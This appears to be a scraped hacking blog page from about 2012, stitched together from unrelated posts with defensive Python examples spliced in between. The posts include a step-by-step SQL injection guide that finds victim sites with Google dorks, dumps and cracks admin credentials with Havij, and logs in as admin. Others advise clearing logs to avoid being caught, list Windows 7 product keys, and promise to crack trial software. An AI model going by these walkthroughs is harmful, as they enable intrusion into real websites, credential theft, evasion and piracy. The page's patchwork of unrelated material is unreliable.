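For auditing your own hosts, the port table above is more useful when compared against what each machine is supposed to expose. The following is an added example, not part of the original post: it parses nmap's normal output and reports open ports missing from a baseline. It goes slightly beyond the page by also accepting the "Nmap scan report for" host header printed by newer nmap releases. The function names and the baseline are assumptions; the sample text is the -A -T4 output shown above with blank lines removed, and only IPv4 hosts are handled.

```python
import re

# Host header: "Interesting ports on IP:" (nmap 4.x, as on this page) or
# "Nmap scan report for [name (]IP[)]" (newer releases).
HOST_RE = re.compile(
    r"^(?:Interesting ports on|Nmap scan report for)\s+"
    r"(?:\S+\s+\()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?:?\s*$")
# Port table row: "80/tcp open http Apache httpd 2.2.0 ((Linux/SUSE))"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$")

SAMPLE_SCAN = """\
Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:42 WIT
Interesting ports on 192.168.0.3:
Not shown: 1693 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.0 ((Linux/SUSE))
113/tcp closed auth
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)
MAC Address: 00:0D:88:B3:72:F3 (D-Link)
Nmap finished: 1 IP address (1 host up) scanned in 58.830 seconds
"""

# Assumed baseline: the (port, protocol) pairs each host is expected to expose.
BASELINE = {"192.168.0.3": {(80, "tcp"), (139, "tcp")}}


def parse_scan(text):
    """Return {ip: [port records]} from nmap normal (-oN style) output."""
    hosts, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        match = HOST_RE.match(line)
        if match:
            current = hosts.setdefault(match.group("ip"), [])
            continue
        match = PORT_RE.match(line)
        if match and current is not None:
            current.append({
                "port": int(match.group("port")),
                "proto": match.group("proto"),
                "state": match.group("state"),
                "service": match.group("service"),
                "version": match.group("version") or "",
            })
    return hosts


def unexpected_open(hosts, baseline):
    """Return (ip, port, proto, service, version) for open ports not in baseline."""
    findings = []
    for ip, ports in sorted(hosts.items()):
        allowed = baseline.get(ip, set())
        for rec in ports:
            if rec["state"] == "open" and (rec["port"], rec["proto"]) not in allowed:
                findings.append((ip, rec["port"], rec["proto"],
                                 rec["service"], rec["version"]))
    return findings


if __name__ == "__main__":
    for finding in unexpected_open(parse_scan(SAMPLE_SCAN), BASELINE):
        print(finding)
```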

How to install Nmap 6.01 in Ubuntu from source?

1. Make sure you have bzip2 and g++ installed. If not, you can install them using the command
      sudo apt-get install bzip2 g++

2. Download nmap 6.01 in any location of your choice. In this example we are going to assume that it is downloaded in ~/Downloads.

Sunday, September 9, 2012

Online Hash Crackers

Cracker             Hashes
Tobtu               50,529,455,839
TMTO                36,436,233,567
MD5Decrypter(uk)    8,700,000,000
OnlineHashCrack     5,211,644,250
AuthSecu            500,000,000

Saturday, September 8, 2012

how to clear log & become anonymous ?
Guyzz this is nt my tut but i wud like to share it coz its very important frall of us!!
Okay, let's begin!

1) How hackers get caught.

- The first thing that gives you away is "LOGS".
You need to know how events, application, and system logs work. If you don't, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/messages or binaries.

google hack trick

Ok today i will show google hack demonstration you've never seen before.
You will never find these fucking google hack codes on internet.
just watch and learn what i have discovered!!!

Ok it's time to show the secrets.

and this is the best google hack codes.

Saturday, September 1, 2012

Speed of your bandwidth(internet speed)

Windows uses 20% of your bandwidth. Here's how to get it back

A nice little tweak for XP. Microsoft reserves 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc.)

Here's how to get it back:

Click Start-->Run-->type "gpedit.msc" without the "

This opens the group policy editor. Then go to:

Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->Limit Reservable Bandwidth

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO.

This will allow the system to reserve nothing, rather than the default 20%.

Top 20 terminal command of ubuntu

1. Kill a running application by its name

killall [app_name]

2. Display disk space usage:

df -h

3. Locate the installation directories of a program:

whereis [app]

How to change login screen of ubuntu 10.10?

Here is a way to change the looks of your login screen, it allows you to change the background, fonts and GTK theme using the Appearance Manager.

First open a Terminal window (Applications -> Accessories -> Terminal) then copy+paste the following line:

sudo cp /usr/share/applications/gnome-appearance-properties.desktop /usr/share/gdm/autostart/LoginWindow

Now close the Terminal window and log out; when logged out, the Appearance window pops up. Here you can make the changes you want, and when you're done you can log in as usual. To prevent the Appearance Manager from opening when you log in, open a Terminal window (Applications -> Accessories -> Terminal), then copy+paste the following line:

sudo unlink /usr/share/gdm/autostart/LoginWindow/gnome-appearance-properties.desktop

USE NOKIA MOBILE AS MODEM IN UBUNTU

1) Connect the phone with USB and select PC Suite mode on the phone (even though you are not using PC Suite, as that is Windows only).
2) Open Network Manager on Ubuntu; it should show an entry for mobile broadband.
3) Select the mobile broadband entry and use the wizard to select the details for your network (I used AIRTEL).
4) You should now be able to select the entry and connect to the internet from Network Manager.

Windows-7 genuine key

22TKD-F8XX6-YG69F-9M66D-PMJBM
TWMF7-M387V-XKW4Y-PVQQD-RK7C8
HTJK6-DXX8T-TVCR6-KDG67-97J8Q
D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV

1. Insert the Windows 7 disc.

2. Then open the disc, open the source folder, and then open product.ini (or search for product.ini on the disc).

3. You can now use the keys seen in Notepad.

FIRESHEEP TUTORIAL(HTTP SESSION HIJACKING)

Firesheep, a Firefox add-on, has recently become very popular for easily carrying out an HTTP session hijacking attack. An HTTP session hijacking attack can't be considered a very sophisticated attack, but it needs some technical knowledge to perform. Firesheep, however, makes the attack child's play. Firesheep was developed by Eric Butler for Firefox and was released at ToorCon 12 to demonstrate how serious cookie stealing can be.

Hacking website using SQL Injection -step by step guide

Before we see what SQL injection is, we should know what SQL and a database are.

Database:


A database is a collection of data. From a website's point of view, the database is used for storing user IDs, passwords, web page details and more.

Some databases are:

* DB servers
* MySQL (open source)
* MSSQL
* MS-ACCESS
* Oracle
* PostgreSQL (open source)
* SQLite

SQL:


Structured Query Language is known as SQL. To communicate with the database, we use SQL queries. Because we are querying the database, it is called a query language.

Definition from Complete reference:


SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name "SQL" is an abbreviation for Structured Query Language.

For historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation "S.Q.L." is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called a relational database.

Simple Basic Queries for SQL:


Select * from table_name:

This statement is used for showing the contents of a table, including the column names.

For eg:

select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):

This statement is used for inserting data into a table.

For eg:

insert into users(username,userid) values('TheSec','break');

What is SQL Injection?


SQL injection is a common and well-known method of hacking at present. Using this method, an unauthorized person can access the database of the website. The attacker can get all details from the database.

What an attacker can do?

* Bypassing logins

* Accessing secret data

* Modifying the contents of the website

* Shutting down the MySQL server
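
The mechanism behind the outcomes listed above, seen from the defender's side, as an added example (not code from the original post): a lookup on an id parameter built by string concatenation, next to the same lookup with a bound parameter and type validation. The in-memory SQLite database, the id column, the row values and the three inputs are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names follow the page's "users" example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, userid TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(85, "TheSec", "break"), (86, "admin", "example"), (87, "guest", "guest")],
    )
    return db

def lookup_vulnerable(db, raw_id):
    # Vulnerable: the request parameter becomes part of the SQL text,
    # so the database parses whatever the client sent as SQL.
    sql = "SELECT username FROM users WHERE id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, raw_id):
    # Hardened: the value is bound as data and is never parsed as SQL.
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in db.execute(sql, (raw_id,))]

def lookup_validated(db, raw_id):
    # Defence in depth: reject anything that is not a plain integer before querying.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return lookup_parameterized(db, int(raw_id))

def compare(db, raw_id):
    # Returns (vulnerable result, parameterized result) for one input.
    try:
        vulnerable = sorted(lookup_vulnerable(db, raw_id))
    except sqlite3.Error as exc:
        vulnerable = "SQL error: %s" % exc
    return vulnerable, sorted(lookup_parameterized(db, raw_id))

if __name__ == "__main__":
    db = make_db()
    for raw in ("85", "85 OR 1=1", "85'"):  # constructed inputs
        print(repr(raw), compare(db, raw))
```

With concatenation, the second input returns every row and the third raises a database error, which is the error signal the post relies on; with a bound parameter both inputs simply match no row.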

Now let's dive into the real procedure for the SQL Injection.
 

 Steps.


Finding Vulnerable Website:

Our best partner for SQL injection is Google. We can find vulnerable websites (hackable websites) using a Google dork list. A Google dork is a search for vulnerable websites using Google's search tricks. There are a lot of tricks for searching in Google, but we are going to use the "inurl:" command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=

Here is the huge list of Google Dork

http://www.4shared.com/file/lzdEULnW/new_file.html

How to use?

Copy one of the above commands and paste it in the Google search box.

Hit enter.

You will get a list of websites.

We have to visit the websites one by one to check for the vulnerability.

So start from the first website.

- After finding the vulnerable website, open Havij. Let's say the vulnerable site has

URL: “http://website.com/index.php?module=pages&id=85”

- If you get an error, then the site is vulnerable to an SQL injection attack.

- Download Havij from here.

- After opening Havij, paste the above URL of the vulnerable site.

- After that, hit “Analyze”, and it will scan the site to check whether SQL injection is possible or not.

- It will tell you the type of server and also the type of OS running on the server, and will give a message like “Target Vulnerable” if the site is vulnerable.

Now go to “Tables” and “Get Database”, and after getting the databases, check all of them and hit “Get Tables”. After getting the tables of the DBs, select the admin table and hit “Get Columns”; after getting the columns, a hacker can check the password and username columns and hit “Get Data”.

Now you will get the data in encrypted form, mostly as an “md5 hash”, but we can decrypt it easily by using Havij or other online tools. After decrypting the md5, you have to find the “admin page” using Havij (find the buttons for decrypting md5 and finding the admin page). Point the browser to the admin page, where you have to enter the decrypted “password” and “username” of the admin to log in to the website.

Thus, after a successful login to the website as admin, the hacker can do whatever he wants.
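
Why the MD5 hashes mentioned above fall to online lookup services (such as those listed under Online Hash Crackers), and how to store passwords so that a precomputed table is useless, as an added example that is not code from the original post. The word list, the function names and the PBKDF2 iteration count are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os

def md5_unsalted(password):
    # Weak scheme described on the page: fast and unsalted, so the same
    # password always produces the same digest on every site.
    return hashlib.md5(password.encode()).hexdigest()

def build_table(wordlist):
    # Stand-in for an online lookup service: digest -> password, computed once.
    return {md5_unsalted(word): word for word in wordlist}

def hash_password(password, iterations=600_000):
    # Hardened storage: random per-user salt plus a deliberately slow KDF.
    salt = os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, derived

def verify_password(password, record):
    salt, iterations, expected = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, expected)  # constant-time comparison

def demo():
    table = build_table(["123456", "password", "letmein"])  # constructed word list
    weak = md5_unsalted("letmein")
    record = hash_password("letmein")
    return {
        "md5_found_in_table": table.get(weak),
        "pbkdf2_found_in_table": table.get(record[2].hex()),
        "login_ok": verify_password("letmein", record),
        "wrong_password_ok": verify_password("letmein1", record),
    }

if __name__ == "__main__":
    print(demo())
```

Because every record carries its own random salt, two users with the same password get different stored values, so a table has to be rebuilt per user at the full cost of the slow KDF.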

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack software and run the trial program forever. Most of us are familiar with software that runs only for a specified period of time in trial mode. Once the trial period has expired, such software stops functioning and demands a purchase. But there is a way to run the software and make it function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in trial mode forever, we have to understand how this software functions. I’ll try to explain this in brief.
